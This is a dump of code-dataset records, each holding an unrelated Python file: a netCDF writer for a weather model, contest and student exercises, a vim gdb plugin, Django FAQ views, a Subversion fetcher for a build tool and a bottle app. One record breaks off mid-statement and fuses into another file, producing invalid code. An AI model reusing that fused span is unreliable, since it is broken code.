##############################################################################\n if output_fields['QV']:\n QV_out = ncf.createVariable('QV', 'f4', ('time', 'level', 'lat', 'lon',) )\n QV_out[-1,:,:,:] = F.QV[:,:,:][GR.iijj].T\n if output_fields['QC']:\n QC_out = ncf.createVariable('QC', 'f4', ('time', 'level', 'lat', 'lon',) )\n QC_out[-1,:,:,:] = F.QC[:,:,:][GR.iijj].T\n if output_fields['WVP']:\n WVP_out = ncf.createVariable('WVP', 'f4', ('time', 'lat', 'lon',) )\n WVP_out[-1,:,:] = WVP.T\n if output_fields['CWP']:\n CWP_out = ncf.createVariable('CWP', 'f4', ('time', 'lat', 'lon',) )\n CWP_out[-1,:,:] = CWP.T\n\n\n\n ####################################################################\n ##############################################################################\n # PROFILES OF CERTAIN FIELDS\n ##############################################################################\n ####################################################################\n if output_fields['UWIND'] > 1:\n UWINDprof_out = ncf.createVariable('UWINDprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['VWIND'] > 1:\n VWINDprof_out = ncf.createVariable('VWINDprof', 'f4', ('time', 'level', 'lats',) )\n if output_fields['VORT'] > 1:\n VORTprof_out = ncf.createVariable('VORTprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['POTT'] > 1:\n POTTprof_out = ncf.createVariable('POTTprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['QV'] > 1:\n QVprof_out = ncf.createVariable('QVprof', 'f4', ('time', 'level', 'lat',) )\n if output_fields['QC'] > 1:\n QCprof_out = ncf.createVariable('QCprof', 'f4', ('time', 'level', 'lat',) )\n for k in range(0,GR.nz):\n if output_fields['UWIND'] > 1:\n UWINDprof_out[-1,GR.nz-k-1,:] = np.mean(F.UWIND[:,:,k][GR.iijj],axis=0)\n if output_fields['VWIND'] > 1:\n VWINDprof_out[-1,GR.nz-k-1,:] = np.mean(F.VWIND[:,:,k][GR.iijjs],axis=0)\n if output_fields['VORT'] > 1:\n VORTprof_out[-1,GR.nz-k-1,:] = np.mean(VORT[:,:,k][GR.iijj],axis=0)\n if output_fields['POTT'] > 1:\n POTTprof_out[-1,GR.nz-k-1,:] = np.mean(F.POTT[:,:,k][GR.iijj],axis=0)\n if output_fields['QV'] > 1:\n QVprof_out[-1,GR.nz-k-1,:] = np.mean(F.QV[:,:,k][GR.iijj],axis=0)\n if output_fields['QC'] > 1:\n QCprof_out[-1,GR.nz-k-1,:] = np.mean(F.QC[:,:,k][GR.iijj],axis=0)\n\n\n\n\n\n\n\n # RADIATION VARIABLES\n if i_radiation:\n SWDIFFLXDO_out =ncf.createVariable('SWDIFFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWDIRFLXDO_out =ncf.createVariable('SWDIRFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXUP_out = ncf.createVariable('SWFLXUP', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXDO_out = ncf.createVariable('SWFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n SWFLXNET_out = ncf.createVariable('SWFLXNET', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXUP_out = ncf.createVariable('LWFLXUP', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXDO_out = ncf.createVariable('LWFLXDO', 'f4', ('time', 'levels', 'lat', 'lon',) )\n LWFLXNET_out = ncf.createVariable('LWFLXNET', 'f4', ('time', 'levels', 'lat', 'lon',) )\n dPOTTdt_RAD_out=ncf.createVariable('dPOTTdt_RAD', 'f4', ('time', 'level', 'lat', 'lon',) )\n #SWFLXDIV_out = ncf.createVariable('SWFLXDIV', 'f4', ('time', 'level', 'lat', 'lon',) )\n #LWFLXDIV_out = ncf.createVariable('LWFLXDIV', 'f4', ('time', 'level', 'lat', 'lon',) )\n\n # SURF VARIABLES\n if i_surface:\n if output_fields['SURFTEMP']:\n SURFTEMP_out = ncf.createVariable('SURFTEMP', 'f4', ('time', 'lat', 'lon',) )\n SURFTEMP_out[-1,:,:] = F.SOILTEMP[:,:,0].T\n #if i_microphysics:\n # 
SOILMOIST_out = ncf.createVariable('SOILMOIST', 'f4', ('time', 'lat', 'lon',) )\n # RAINRATE_out = ncf.createVariable('RAINRATE', 'f4', ('time', 'lat', 'lon',) )\n # ACCRAIN_out = ncf.createVariable('ACCRAIN', 'f4', ('time', 'lat', 'lon',) )\n # SOILEVAPITY_out = ncf.createVariable('SOILEVAPITY', 'f4', ('time', 'lat', 'lon',) )\n if i_radiation:\n if output_fields['SURFALBEDSW']:\n SURFALBEDSW_out = ncf.createVariable('SURFALBEDSW', 'f4',\n ('time', 'lat', 'lon',) )\n SURFALBEDSW_out[0,:,:] = F.SURFALBEDSW.T\n if output_fields['SURFALBEDLW']:\n SURFALBEDLW_out = ncf.createVariable('SURFALBEDLW', 'f4',\n ('time', 'lat', 'lon',) )\n SURFALBEDLW_out[0,:,:] = F.SURFALBEDLW.T\n\n\n # MICROPHYSICS VARIABLES\n if i_microphysics:\n RH_out = ncf.createVariable('RH', 'f4', ('time', 'level', 'lat', 'lon',) )\n dQVdt_MIC_out = ncf.createVariable('dQVdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n dQCdt_MIC_out = ncf.createVariable('dQCdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n dPOTTdt_MIC_out=ncf.createVariable('dPOTTdt_MIC', 'f4',\n ('time', 'level', 'lat', 'lon',) )\n\n\n\n ################################################################################\n ################################################################################\n ################################################################################\n\n if i_surface:\n pass\n #if i_microphysics:\n # SOILMOIST_out[-1,:,:] = SURF.MOIST.T\n # RAINRATE_out[-1,:,:] = SURF.RAINRATE.T*3600 # mm/h\n # ACCRAIN_out[-1,:,:] = SURF.ACCRAIN.T # mm\n # SOILEVAPITY_out[-1,:,:] = SURF.SOILEVAPITY.T\n\n\n for k in range(0,GR.nz):\n\n # RADIATION VARIABLES\n if i_radiation > 0:\n dPOTTdt_RAD_out[-1,k,:,:] = F.dPOTTdt_RAD[:,:,k].T * 3600\n #SWFLXDIV_out[-1,k,:,:] = RAD.SWFLXDIV[:,:,k].T \n #LWFLXDIV_out[-1,k,:,:] = RAD.LWFLXDIV[:,:,k].T \n\n # MICROPHYSICS VARIABLES\n if i_microphysics:\n RH_out[-1,k,:,:] = MIC.RH[:,:,k].T\n dQVdt_MIC_out[-1,k,:,:] = F.dQVdt_MIC[:,:,k].T * 3600\n dQCdt_MIC_out[-1,k,:,:] = F.dQCdt_MIC[:,:,k].T * 3600\n dPOTTdt_MIC_out[-1,k,:,:] = F.dPOTTdt_MIC[:,:,k].T * 3600\n\n\n\n for ks in range(0,GR.nzs):\n\n\n # RADIATION VARIABLES\n if i_radiation > 0:\n SWDIFFLXDO_out[-1,ks,:,:] = RAD.SWDIFFLXDO[:,:,ks].T\n SWDIRFLXDO_out[-1,ks,:,:] = RAD.SWDIRFLXDO[:,:,ks].T\n SWFLXUP_out[-1,ks,:,:] = RAD.SWFLXUP[:,:,ks].T\n SWFLXDO_out[-1,ks,:,:] = RAD.SWFLXDO[:,:,ks].T\n SWFLXNET_out[-1,ks,:,:] = F.SWFLXNET[:,:,ks].T\n LWFLXUP_out[-1,ks,:,:] = RAD.LWFLXUP[:,:,ks].T\n LWFLXDO_out[-1,ks,:,:] = RAD.LWFLXDO[:,:,ks].T\n LWFLXNET_out[-1,ks,:,:] = F.LWFLXNET[:,:,ks].T\n\n\n ncf.close()\n\n\n\n\ndef constant_fields_to_NC(GR, F, RAD, SURF):\n\n print('###########################################')\n print('###########################################')\n print('write constant fields')\n print('###########################################')\n print('###########################################')\n\n filename = output_path+'/constants.nc'\n\n ncf = Dataset(filename, 'w', format='NETCDF4')\n ncf.close()\n\n ncf = Dataset(filename, 'a', format='NETCDF4')\n\n # DIMENSIONS\n lon_dim = ncf.createDimension('lon', GR.nx)\n lons_dim = ncf.createDimension('lons', GR.nxs)\n lat_dim = ncf.createDimension('lat', GR.ny)\n lats_dim = ncf.createDimension('lats', GR.nys)\n level_dim = ncf.createDimension('level', GR.nz)\n levels_dim = ncf.createDimension('levels', GR.nzs)\n\n # DIMENSION VARIABLES\n lon = ncf.createVariable('lon', 'f4', ('lon',) )\n lons = ncf.createVariable('lons', 'f4', ('lons',) )\n lat = ncf.createVariable('lat', 'f4', ('lat',) )\n 
lats = ncf.createVariable('lats', 'f4', ('lats',) )\n    level = ncf.createVariable('level', 'f4', ('level',) )\n    levels = ncf.createVariable('levels', 'f4', ('levels',) )\n\n    lon[:] = GR.lon_rad[GR.ii,GR.nb+1]\n    lons[:] = GR.lonis_rad[GR.iis,GR.nb+1]\n    lat[:] = GR.lat_rad[GR.nb+1,GR.jj]\n    lats[:] = GR.latjs_rad[GR.nb+1,GR.jjs]\n    level[:] = GR.level\n    levels[:] = GR.levels\n\n\n    # VARIABLES\n    HSURF_out = ncf.createVariable('HSURF', 'f4', ('lat', 'lon',) )\n    HSURF_out[:,:] = F.HSURF[GR.iijj].T\n\n    # SURF VARIABLES\n    if i_surface:\n        OCEANMASK_out = ncf.createVariable('OCEANMASK', 'f4', ('lat', 'lon',) )\n        OCEANMASK_out[:,:] = F.OCEANMASK.T\n\n    # RADIATION VARIABLES\n    ncf.close()\n\n\n","sub_path":"nc_IO.py","file_name":"nc_IO.py","file_ext":"py","file_size_in_byte":15950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"376658496","text":"def solve(grid):\r\n    numbers = {}\r\n    for i in grid:\r\n        for j in i:\r\n            if j in numbers:\r\n                numbers[j] += 1\r\n            else:\r\n                numbers[j] = 1\r\n\r\n    answer = []\r\n    for i in numbers:\r\n        if numbers[i] % 2 != 0:\r\n            answer.append(int(i))\r\n    answer.sort()\r\n    answer = [str(i) for i in answer]\r\n    answer = ' '.join(answer)\r\n\r\n    return answer\r\n\r\ncases = int(input())\r\ngrids = []\r\n\r\nfor _ in range(cases):\r\n    n = int(input())\r\n    grid = []\r\n    for _ in range((n*2)-1):\r\n        grid.append(input().split())\r\n    grids.append(grid)\r\n\r\nfor i, grid in enumerate(grids):\r\n    print(\"Case #{}: {}\".format(i+1, solve(grid)))\r\n\r\n\r\n","sub_path":"codes/BuildLinks1.10/test_input/CJ_16_1/16_1_2_Steve99_two.py","file_name":"16_1_2_Steve99_two.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"281370560","text":"def main():\n    from Prac07.guitar import Guitar\n    guitars = []\n\n    guitars.append([\"Gibson L-5 CES\", 1922, 16035.40])\n    guitars.append([\"Line 6 JTV-59\", 2010, 1512.9])\n    # test input ^\n\n    # We should be appending an item that uses the Guitar Class to a list called \"guitars\":\n    # guitars.append(Guitar(\"Gibson L-5 CES\", 1922, 16035.40))\n\n    print(\"My guitars!\")\n    loop = True\n    while loop:\n        guitar_name = input(\"Name: \")\n        if guitar_name != \"\":\n            guitar_year = int(input(\"Year: \")) # no type-error checking\n            guitar_cost = float(input(\"Cost: $\")) # no type-error checking\n            guitars.append([guitar_name, guitar_year, guitar_cost])\n            print(guitars)\n        else:\n            loop = False\n\n    print(\"These are my guitars:\")\n    for item, guitar in enumerate(guitars):\n        index = Guitar(guitar[0], guitar[1], guitar[2]) # bad var name\n        print(\"Guitar {}: {} ({}), worth ${}\".format(item + 1, guitar[0], guitar[1], guitar[2]), end = '')\n        if index.is_vintage():\n            print(\"(vintage)\")\n        else:\n            print(\"\")\n\n    # print should look like:\n    # (\"Guitar {}: {:>20} ({}), worth ${:10,.2f} {}\".format(i + 1, guitar.name, guitar.year, guitar.cost, vintage_string))\n    # The variable vintage_string is set to \"\" or \"(vintage)\" depending on the is_vintage() method\n\n    # output should look like:\n    # Guitar 1: Fender Stratocaster (2014), worth $    765.40\n    # Guitar 2:      Gibson L-5 CES (1922), worth $ 16,035.40 (vintage)\n\n\nmain()\n","sub_path":"Prac07/ownedGuitars.py","file_name":"ownedGuitars.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"426807995","text":"def muestraMenorEdad():\n    #Define variables and other setup\n    pnombre=\"\"\n    pedad=0\n    #Input data\n    p1nombre=input(\"Enter the 1st person's name:\")\n    p1edad=int(input(\"Enter the 1st person's age:\"))\n    p2nombre=input(\"Enter the 2nd person's name:\")\n    p2edad=int(input(\"Enter the 2nd person's age:\"))\n    p3nombre=input(\"Enter the 3rd person's name:\")\n    p3edad=int(input(\"Enter the 3rd person's age:\")) \n    #Process\n    if p1edad': (1, 0),\n             '<': (-1, 0),\n             'v': (0, -1)}\n    def next_pos(cur_pos, move):\n        return tuple(cur_pos[i] + moves[move][i] for i in [0, 1])\n    points = set([start_pos])\n    for move in content:\n        if move in moves:\n            start_pos = next_pos(start_pos, move)\n            points.add(start_pos)\n\n    print(len(points))\n\n    points = set([(0, 0)])\n    santas_pos = [(0, 0), (0, 0)]\n    for move_number, move in enumerate(filter(lambda m: m in moves, content)):\n        santas_pos[move_number % 2] = next_pos(santas_pos[move_number % 2], move)\n        points.add(santas_pos[move_number % 2])\n\n    print(len(points))\n\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"day3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"85674672","text":"import os\nimport inspect\nimport sys\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nptyprocessdir = os.path.join(currentdir, \"../lib/ptyprocess\")\npexpectdir = os.path.join(currentdir, \"../lib/pexpect\")\npoyodir = os.path.join(currentdir, \"../lib/poyo\")\nsys.path.insert(0, currentdir)\nsys.path.insert(0, ptyprocessdir)\nsys.path.insert(0, pexpectdir)\nsys.path.insert(0, poyodir)\n\nimport pexpect\n\nimport vim\nimport re\n\nfrom command_handler import CommandHandler\nfrom config import Config\nimport symbols_status as SymbolsStatus\n\nclass Vgdb(object):\n\n    def __init__(self):\n        self.startup_commands = ''\n        self.current_command = ''\n        self.cmd_hnd = None\n        self.entrypoint = None\n        self.current_frame_address = ''\n        self.config_dictionary = {}\n\n    def start_gdb(self, commands):\n        try:\n            self.startup_commands = commands\n            self.cmd_hnd = CommandHandler(commands)\n        except Exception as ex:\n            print(\"error in Vgdb.start_gdb(): \" + str(ex))\n\n    def run_command_with_result(self, command, buffer_name=''):\n        try:\n            vim.command(\"let g:vg_query_result = []\")\n            lines = self.cmd_hnd.run_command(command, buffer_name)\n            if lines:\n                for line in lines:\n                    vim.command(\"call add(g:vg_query_result, '\" + line + \"' )\")\n        except Exception as ex:\n            print(\"error in Vgdb.run_command(): \" + str(ex))\n\n    def run_stepi(self):\n        self.current_frame_address = self.cmd_hnd.run_command_get_match(\"stepi\", '(0x[0-9a-f]{2,16})')\n        self.try_set_breakpoint()\n\n    def run_continue(self):\n        self.current_frame_address = self.cmd_hnd.run_command_get_match(\"continue\", '(0x[0-9a-f]{2,16})')\n        self.try_set_breakpoint()\n\n    def try_set_breakpoint(self):\n        if self.current_frame_address:\n            vim.command(\"let g:vg_current_frame_address = '\" + self.current_frame_address + \"'\")\n\n    def display_disassembly(self):\n        self.get_set_entrypoint()\n        self.run_command_with_result(\"info breakpoints\", \"vg_breakpoints\")\n        self.run_command_with_result(\"disassemble\", 'vg_disassembly')\n\n    def get_set_entrypoint(self):\n        if not self.entrypoint:\n            self.entrypoint = self.cmd_hnd.run_command_get_match(\"info file\", 'Entry point: (0x[0-9a-f]{2,16})')\n            if self.entrypoint:\n                self.entrypoint = self.pad_hexadecimal_to_64bit(self.entrypoint)\n                self.current_frame_address = self.entrypoint\n                vim.command(\"let g:vg_app_entrypoint = '\" + 
self.entrypoint + \"'\")\n                self.try_set_breakpoint()\n\n    def pad_hexadecimal_to_64bit(self, hex_string):\n        return '0x' + hex_string[2:].zfill(16)\n\n    def run_to_entrypoint(self):\n        self.get_set_entrypoint()\n        if self.entrypoint:\n            self.cmd_hnd.run_command(\"break *\" + self.entrypoint)\n            remote_target = vim.eval('g:vg_remote_target')\n            if remote_target:\n                self.cmd_hnd.run_command(\"continue\")\n            else:\n                self.cmd_hnd.run_command(\"run\")\n        else:\n            print(\"error: unable to get entrypoint\")\n\n    def get_config(self):\n        self.config_dictionary = Config().get()\n","sub_path":"autoload/vgdb/vgdb.py","file_name":"vgdb.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"514766548","text":"from django.shortcuts import render\nfrom learn.models import *\nfrom learn.forms import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import CreateView\n\n\n@login_required\ndef faqs(request, module_id):\n    values = dict()\n    values['module'] = Module.objects.get(pk=module_id)\n    values['title'] = values['module'].module_code+\" FAQ\"\n    values['lectures'] = values['module'].lecture_set.all\n    values['faqs'] = FAQQuestion.objects.filter(module=values['module'])\n    values['modules'] = []\n\n    courses = request.user.course.all()\n\n    for course in courses:\n        for module in course.modules.all():\n            values['modules'].append(module)\n\n    values['modules'] = set(values['modules'])\n\n    return render(request, 'faqs.html', values)\n\nclass CreateFAQQuestionView(CreateView):\n    model = FAQQuestion\n    template_name = \"faqquestion_form.html\"\n\n    def form_valid(self, form):\n        faq_question = form.save(commit=False)\n        faq_question.author = self.request.user\n        faq_question.module = Module.objects.get(pk=self.kwargs['module_id'])\n        faq_question.save()\n        return super(CreateFAQQuestionView, self).form_valid(form)\n\n\nclass CreateFAQAnswerView(CreateView):\n    model = FAQAnswer\n    template_name = \"faqanswer_form.html\"\n\n\n    def get_context_data(self, **kwargs):\n        context = super(CreateFAQAnswerView, self).get_context_data(**kwargs)\n        context['faq_id'] = self.kwargs['faq_id']\n        return context\n\n    def form_valid(self, form):\n        faq_answer = form.save(commit=False)\n        faq_answer.author = self.request.user\n        faq_answer.question = FAQQuestion.objects.get(pk=self.kwargs['faq_id'])\n        faq_answer.save()\n        return super(CreateFAQAnswerView, self).form_valid(form)","sub_path":"CM2301/learn/views/faq.py","file_name":"faq.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
+{"seq_id":"164803313","text":"class CardCounts(dict):\n    def __init__(self, *args, **kwargs):\n        self.count = 0\n        dict.__init__(self, *args, **kwargs)\n    def __getitem__(self, idx):\n        self.setdefault(idx, 0)\n        return dict.__getitem__(self, idx)\n    def __setitem__(self, key, value):\n        if value <= 0:\n            self.count -= self[key]\n            del self[key]\n        else:\n            self.count -= (self[key] - value)\n            dict.__setitem__(self, key, value)\n\n    def sortedKeys(self):\n        # sort keys by descending count (Python 3 has no list.sort(cmp=...))\n        sortedItems = sorted(self.items(), key=lambda item: item[1], reverse=True)\n        return [x[0] for x in sortedItems]\n\n    def totalCount(self):\n        return self.count\n    '''\n    Return probabilities for each card\n    '''\n    def normalize(self):\n        total = float(self.totalCount())\n        if total == 0: return\n        for key in self.keys():\n            self[key] = self[key] / total\n        self.count = 1\n\n    def divideAll(self, divisor):\n        divisor = 
float(divisor)\n for key in self:\n self[key] /= divisor\n self.count /= divisor\n\n def copy(self):\n return CardCounts(dict.copy(self))\n\n def __mul__(self, y ):\n sum = 0\n x = self\n if len(x) > len(y):\n x,y = y,x\n for key in x:\n if key not in y:\n continue\n sum += x[key] * y[key]\n return sum\n\n def __radd__(self, y):\n for key, value in y.items():\n self[key] += value\n self.count += value\n\n def __add__( self, y ):\n addend = CardCounts()\n for key in self:\n if key in y:\n addend[key] = self[key] + y[key]\n else:\n addend[key] = self[key]\n addend.count += addend[key]\n for key in y:\n if key in self:\n continue\n addend[key] = y[key]\n addend.count += addend[key]\n return addend\n\n def decKey(self, key, num=1):\n curr = self[key]\n self[key] = curr - num if curr > num else 0\n self.count -= num if curr > num else 0\n if not self[key]:\n del self[key]\n\n def __sub__( self, y ):\n addend = CardCounts()\n for key in self:\n if key in y:\n addend[key] = self[key] - y[key]\n else:\n addend[key] = self[key]\n addend.count += addend[key]\n for key in y:\n if key in self:\n continue\n addend[key] = -1 * y[key]\n addend.count += addend[key]\n return addend\n\n\n","sub_path":"util/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"172430240","text":"#\r\n# copyright (c) 2009 Ralf Habacker \r\n#\r\n# subversion support\r\n## \\todo needs dev-utils/subversion package, add some kind of tool requirement tracking for SourceBase derived classes\r\n\r\nfrom Source.VersionSystemSourceBase import *\r\n\r\nclass SvnSource (VersionSystemSourceBase):\r\n \"\"\"subversion support\"\"\"\r\n def __init__(self, subinfo=None):\r\n utils.trace( \"SvnSource.__init__\", 2 )\r\n if subinfo:\r\n self.subinfo = subinfo\r\n VersionSystemSourceBase.__init__( self )\r\n self.options = None\r\n ## \\todo add internal dependency for subversion package\r\n self.svnInstallDir = os.path.join(self.rootdir, 'dev-utils', 'svn', 'bin')\r\n\r\n def checkoutDir( self, index=0 ):\r\n utils.trace( \"SvnSource.checkoutDir\", 2 )\r\n if self.subinfo.hasSvnTarget():\r\n u = self.getUrl(index)\r\n (url, dummy) = self.splitUrl(u)\r\n\r\n if url.find(\"://\") == -1:\r\n if os.getenv(\"KDESVNDIR\") == None:\r\n sourcedir = os.path.join( self.downloadDir(), \"svn-src\", \"kde\", url )\r\n else:\r\n sourcedir = os.path.join( os.getenv(\"KDESVNDIR\"), url )\r\n else:\r\n sourcedir = os.path.join( self.downloadDir(), \"svn-src\" )\r\n sourcedir = os.path.join( sourcedir, self.package )\r\n _, path = self.__splitPath(url)\r\n if path and utils.envAsBool(\"EMERGE_SVN_STDLAYOUT\"):\r\n sourcedir = os.path.join( sourcedir, path )\r\n else:\r\n utils.die(\"svnTarget property not set for this target\")\r\n\r\n if self.subinfo.targetSourceSuffix() != None:\r\n sourcedir = \"%s-%s\" % (sourcedir, self.subinfo.targetSourceSuffix())\r\n\r\n return sourcedir\r\n\r\n def applyPatch(self, fileName, patchdepth, unusedSrcDir=None):\r\n \"\"\"apply a patch to a svn repository checkout\"\"\"\r\n utils.trace( \"SvnSource.applyPatch\", 2 )\r\n if fileName:\r\n patchfile = os.path.join (self.packageDir(), fileName)\r\n # @todo check if this could be merged into SourceBase.applyPatch\r\n if self.noCopy:\r\n srcdir = self.sourceDir()\r\n else:\r\n srcdir = self.buildDir()\r\n return utils.applyPatch(srcdir, patchfile, patchdepth)\r\n return True\r\n\r\n def setProxy(self):\r\n \"\"\"set proxy for fetching sources from 
subversion repository\"\"\"\r\n (host, port, username, password) = self.proxySettings()\r\n if host == None:\r\n return\r\n\r\n proxyOptions = \" --config-option servers:global:http-proxy-host=%s\" % host\r\n proxyOptions += \" --config-option servers:global:http-proxy-port=%s\" % port\r\n if username != None:\r\n proxyOptions += \" --config-option servers:global:http-proxy-username=%s\" % username\r\n proxyOptions += \" --config-option servers:global:http-proxy-password=%s\" % password\r\n\r\n self.options = proxyOptions\r\n\r\n def fetch( self, repopath = None ):\r\n \"\"\" checkout or update an existing repository path \"\"\"\r\n utils.trace( \"SvnSource.fetch\", 2 )\r\n if self.noFetch:\r\n utils.debug( \"skipping svn fetch (--offline)\" )\r\n return True\r\n\r\n if not os.path.exists(self.svnInstallDir):\r\n utils.die(\"required subversion package not installed in %s\" % self.svnInstallDir)\r\n\r\n for i in range(self.repositoryUrlCount()):\r\n if repopath:\r\n url = repopath\r\n else:\r\n url = self.repositoryUrl(i)\r\n self.__tryCheckoutFromRoot(url, self.checkoutDir(i), self.repositoryUrlOptions(i) != 'norecursive')\r\n return True\r\n\r\n def __getCurrentRevision( self ):\r\n \"\"\" return the revision returned by svn info \"\"\"\r\n\r\n revision = None\r\n # first, change the output to always be english\r\n if \"LANG\" in os.environ:\r\n oldLanguage = os.environ[\"LANG\"]\r\n else:\r\n oldLanguage = \"\"\r\n os.environ[\"LANG\"] = \"C\"\r\n\r\n # handle multiple urls in targets\r\n # we need to find the main url which is marked with #main\r\n # if not marked use the second last one, which is used currently\r\n sourcedir = None\r\n n = self.repositoryUrlCount()\r\n if n > 1:\r\n for i in range(0, n):\r\n if self.repositoryUrlOptions(i) == 'main':\r\n sourcedir = self.checkoutDir(i)\r\n break\r\n # if not found use the second last one\r\n if sourcedir == None:\r\n sourcedir = self.checkoutDir(n-2)\r\n else:\r\n sourcedir = self.checkoutDir()\r\n\r\n # set up the command\r\n cmd = \"%s/svn info %s\" % ( self.svnInstallDir, sourcedir )\r\n\r\n # open a temporary file - do not use generic tmpfile because this doesn't give a good file object with python\r\n tempFileName = os.path.join( self.checkoutDir().replace('/', '\\\\'), \".emergesvninfo.tmp\" )\r\n with open( tempFileName, \"wb+\" ) as tempfile:\r\n\r\n # run the command\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n utils.system( cmd, stdout=tempfile )\r\n\r\n tempfile.seek(os.SEEK_SET)\r\n # read the temporary file and find the line with the revision\r\n for line in tempfile:\r\n if line.startswith(\"Revision: \"):\r\n revision = line.replace(\"Revision: \", \"\").strip()\r\n break\r\n\r\n os.environ[\"LANG\"] = oldLanguage\r\n os.remove( tempFileName )\r\n return revision\r\n\r\n def __splitPath(self, path):\r\n \"\"\" split a path into a base part and a relative repository url.\r\n The delimiters are currently 'trunk', 'branches' and 'tags'.\r\n \"\"\"\r\n pos = path.find('trunk')\r\n if pos == -1:\r\n pos = path.find('branches')\r\n if pos == -1:\r\n pos = path.find('tags')\r\n if pos == -1:\r\n ret = [path, None]\r\n else:\r\n ret = [path[:pos-1], path[pos:]]\r\n return ret\r\n\r\n def __tryCheckoutFromRoot ( self, url, sourcedir, recursive=True ):\r\n \"\"\"This method checkout source with svn informations from\r\n the svn root repository directory. 
It detects the svn root\r\n by searching the predefined root subdirectories 'trunk', 'branches'\r\n and 'tags' which will probably fit for most servers\r\n \"\"\"\r\n (urlBase, urlPath) = self.__splitPath(url)\r\n if urlPath == None:\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n (srcBase, srcPath) = self.__splitPath(sourcedir)\r\n if srcPath == None:\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n urlRepo = urlBase\r\n srcDir = srcBase\r\n urlParts = urlPath.split('/')\r\n pathSep = '/'\r\n srcParts = srcPath.split(pathSep)\r\n\r\n # url and source parts not match\r\n if len(urlParts) != len(srcParts):\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n for i in range(0, len(urlParts)-1):\r\n urlPart = urlParts[i]\r\n srcPart = srcParts[i]\r\n if ( urlPart == \"\" ):\r\n continue\r\n\r\n urlRepo += '/' + urlPart\r\n srcDir += pathSep + srcPart\r\n\r\n if os.path.exists(srcDir):\r\n continue\r\n self.__checkout( urlRepo, srcDir, False )\r\n\r\n self.__checkout( url, sourcedir, recursive )\r\n\r\n def __checkout( self, url, sourcedir, recursive=True ):\r\n \"\"\"internal method for subversion checkout and update\"\"\"\r\n option = \"\"\r\n if not recursive:\r\n option = \"--depth=files\"\r\n\r\n if utils.verbose() < 2 and not utils.envAsBool(\"KDESVNVERBOSE\"):\r\n option += \" --quiet\"\r\n\r\n self.setProxy()\r\n\r\n if self.options != None:\r\n option += self.options\r\n\r\n if self.subinfo.options.fetch.ignoreExternals:\r\n option += \" --ignore-externals \"\r\n\r\n url = utils.replaceVCSUrl( url )\r\n\r\n if os.path.exists( sourcedir ):\r\n cmd = \"%s/svn update %s %s\" % ( self.svnInstallDir, option, sourcedir )\r\n else:\r\n cmd = \"%s/svn checkout %s %s %s\" % (self.svnInstallDir, option, url, sourcedir )\r\n\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n return utils.system( cmd )\r\n\r\n def createPatch( self ):\r\n \"\"\"create patch file from svn source into the related package dir. 
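The root-by-root checkout above hinges on the rule in __splitPath: cut the path at the first 'trunk', 'branches' or 'tags' component, checked in that order. A standalone sketch of that rule (the function name and example URL are illustrative only, not part of SvnSource):

# Split an svn path into (base, relative) at trunk/branches/tags,
# dropping the separator just before the matched component.
def split_svn_path(path):
    for delimiter in ('trunk', 'branches', 'tags'):
        pos = path.find(delimiter)
        if pos != -1:
            return path[:pos - 1], path[pos:]
    return path, None

# split_svn_path('svn://anonsvn.kde.org/home/kde/trunk/KDE/kdelibs')
# -> ('svn://anonsvn.kde.org/home/kde', 'trunk/KDE/kdelibs')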
The patch file is named autocreated.patch\"\"\"\r\n cmd = \"%s/svn diff %s > %s\" % ( self.svnInstallDir, self.checkoutDir(), os.path.join( self.packageDir(), \"%s-%s.patch\" % \\\r\n ( self.package, str( datetime.date.today() ).replace('-', '') ) ) )\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n return utils.system( cmd )\r\n\r\n def sourceVersion( self ):\r\n \"\"\" print the revision returned by svn info \"\"\"\r\n return True\r\n\r\n def getUrls( self ):\r\n \"\"\"print the url where to check out from\"\"\"\r\n for i in range(self.repositoryUrlCount()):\r\n url = self.repositoryUrl(i)\r\n if self.repositoryUrlOptions(i) == 'norecursive': url = '--depth=files ' + url\r\n print(url)\r\n return True\r\n\r\n def currentRevision(self):\r\n \"\"\"return the name or number of the current revision\"\"\"\r\n return self.__getCurrentRevision()\r\n","sub_path":"Source/SvnSource.py","file_name":"SvnSource.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"253101946","text":"import bottle\nimport os\nimport model\nfrom model import Sopek\nimport json\n\n\n@bottle.get(\"/\")\ndef osnovna_stran():\n stanje = izbira()\n return bottle.template(\n \"osnovna_stran.html\",\n namen=stanje.namen(),\n 